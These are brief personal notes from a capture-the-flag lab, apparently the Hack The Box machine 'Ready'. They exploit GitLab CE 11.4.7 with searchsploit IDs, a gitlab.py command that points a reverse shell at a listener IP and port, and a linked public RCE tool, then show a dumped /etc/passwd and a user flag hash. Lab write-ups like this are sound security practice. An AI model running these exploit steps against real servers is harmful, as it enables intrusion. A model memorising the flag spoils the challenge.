22 SSH
5080 HTTP

Web App:
	GitLab CE Version 11.4.7
	User created (test, test@htb, testtest)
	
	Searchsploit RCE 49334 49257 49263

used searchsploit 49334

python3 gitlab.py -u test -p testtest -g http://ready.htb -l 10.10.16.258 -P 4242

Made project on Gitlabs, but nothing coming through msf listener


fuck it, using this:
https://github.com/dotPY-hax/gitlab_RCE

/etc/passwd:
git:x:998:998::/var/opt/gitlab:/bin/sh
gitlab-www:x:999:999::/var/opt/gitlab/nginx:/bin/false
gitlab-redis:x:997:997::/var/opt/gitlab/redis:/bin/false
gitlab-psql:x:996:996::/var/opt/gitlab/postgresql:/bin/sh
mattermost:x:994:994::/var/opt/gitlab/mattermost:/bin/sh
registry:x:993:993::/var/opt/gitlab/registry:/bin/sh
gitlab-prometheus:x:992:992::/var/opt/gitlab/prometheus:/bin/sh
gitlab-consul:x:991:991::/var/opt/gitlab/consul:/bin/sh
dude:x:1000:1000::/home/dude:/bin/bash
in /home/dude
user.txt:
e1e30b052b6ec0670698805d745e7682

check /opt/backup

